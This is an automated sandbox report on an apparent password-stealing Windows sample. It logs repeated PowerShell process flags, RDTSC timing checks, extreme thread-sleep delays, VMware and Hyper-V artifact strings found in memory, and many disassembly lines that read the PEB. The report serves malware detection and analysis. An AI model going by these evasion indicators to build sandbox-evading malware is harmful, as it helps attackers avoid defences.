          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000000E79904 second address: 0000000000E7990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 0000000000E79B7E second address: 0000000000E79B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe TID: 6916 Thread sleep time: -34627s >= -30000s
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe TID: 6876 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7032 Thread sleep time: -10145709240540247s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2892 Thread sleep time: -7378697629483816s >= -30000s
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe TID: 7008 Thread sleep time: -34627s >= -30000s
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe TID: 5040 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 6196 Thread sleep count: 50 > 30
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 6196 Thread sleep time: -100000s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_00409AB0 rdtsc 10_2_00409AB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9352
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9450
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 863
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 838
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe API coverage: 1.5 %
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Thread delayed: delay time: 34627
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exe Thread delayed: delay time: 34627
          Source: explorer.exe, 0000000F.00000000.451928214.00000000008B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}efb8b}
          Source: explorer.exe, 0000000F.00000003.581521164.0000000008644000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 0000000F.00000003.554148817.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 0000000F.00000000.470103490.000000000F03A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000F.00000003.554148817.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000F.00000000.454543147.00000000043B0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000F.00000003.575314509.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 0000000F.00000003.557721629.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.581328798.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.565131674.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.568851741.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.573216031.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.578315402.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.582536071.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.584721689.000000000ECDA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWta%SystemRoot%\system32\mswsock.dll\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerCoS-z
          Source: explorer.exe, 0000000F.00000003.581521164.0000000008644000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0180C182 mov eax, dword ptr fs:[00000030h] 10_2_0180C182
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018AA189 mov eax, dword ptr fs:[00000030h] 10_2_018AA189
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018AA189 mov ecx, dword ptr fs:[00000030h] 10_2_018AA189
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0181A185 mov eax, dword ptr fs:[00000030h] 10_2_0181A185
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_017EB171 mov eax, dword ptr fs:[00000030h] 10_2_017EB171
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01812990 mov eax, dword ptr fs:[00000030h] 10_2_01812990
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01814190 mov eax, dword ptr fs:[00000030h] 10_2_01814190
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_017EC962 mov eax, dword ptr fs:[00000030h] 10_2_017EC962
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018669A6 mov eax, dword ptr fs:[00000030h] 10_2_018669A6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_017E395E mov eax, dword ptr fs:[00000030h] 10_2_017E395E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018161A0 mov eax, dword ptr fs:[00000030h] 10_2_018161A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018A49A4 mov eax, dword ptr fs:[00000030h] 10_2_018A49A4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018651BE mov eax, dword ptr fs:[00000030h] 10_2_018651BE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018099BF mov ecx, dword ptr fs:[00000030h] 10_2_018099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018099BF mov eax, dword ptr fs:[00000030h] 10_2_018099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_017E3138 mov ecx, dword ptr fs:[00000030h] 10_2_017E3138
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018A19D8 mov eax, dword ptr fs:[00000030h] 10_2_018A19D8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018B89E7 mov eax, dword ptr fs:[00000030h] 10_2_018B89E7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018741E8 mov eax, dword ptr fs:[00000030h] 10_2_018741E8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_017E9100 mov eax, dword ptr fs:[00000030h] 10_2_017E9100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_017F0100 mov eax, dword ptr fs:[00000030h] 10_2_017F0100
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_017E31E0 mov eax, dword ptr fs:[00000030h] 10_2_017E31E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_017EB1E1 mov eax, dword ptr fs:[00000030h] 10_2_017EB1E1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01804120 mov eax, dword ptr fs:[00000030h] 10_2_01804120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01804120 mov ecx, dword ptr fs:[00000030h] 10_2_01804120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0181513A mov eax, dword ptr fs:[00000030h] 10_2_0181513A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_0180B944 mov eax, dword ptr fs:[00000030h] 10_2_0180B944
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018A1951 mov eax, dword ptr fs:[00000030h] 10_2_018A1951
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_017E519E mov eax, dword ptr fs:[00000030h] 10_2_017E519E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_017E519E mov ecx, dword ptr fs:[00000030h] 10_2_017E519E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018AE962 mov eax, dword ptr fs:[00000030h] 10_2_018AE962
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018B8966 mov eax, dword ptr fs:[00000030h] 10_2_018B8966
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_01863884 mov eax, dword ptr fs:[00000030h] 10_2_01863884
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018120A0 mov eax, dword ptr fs:[00000030h] 10_2_018120A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_017E7057 mov eax, dword ptr fs:[00000030h] 10_2_017E7057
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_018290AF mov eax, dword ptr fs:[00000030h] 10_2_018290AF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe Code function: 10_2_017E5050 mov eax, dword ptr fs:[00000030h] 10_2_017E5050
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181F0BF mov ecx, dword ptr fs:[00000030h]10_2_0181F0BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181F0BF mov eax, dword ptr fs:[00000030h]10_2_0181F0BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181F0BF mov eax, dword ptr fs:[00000030h]10_2_0181F0BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A18CA mov eax, dword ptr fs:[00000030h]10_2_018A18CA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FB02A mov eax, dword ptr fs:[00000030h]10_2_017FB02A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FB02A mov eax, dword ptr fs:[00000030h]10_2_017FB02A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FB02A mov eax, dword ptr fs:[00000030h]10_2_017FB02A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FB02A mov eax, dword ptr fs:[00000030h]10_2_017FB02A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0187B8D0 mov eax, dword ptr fs:[00000030h]10_2_0187B8D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0187B8D0 mov ecx, dword ptr fs:[00000030h]10_2_0187B8D0
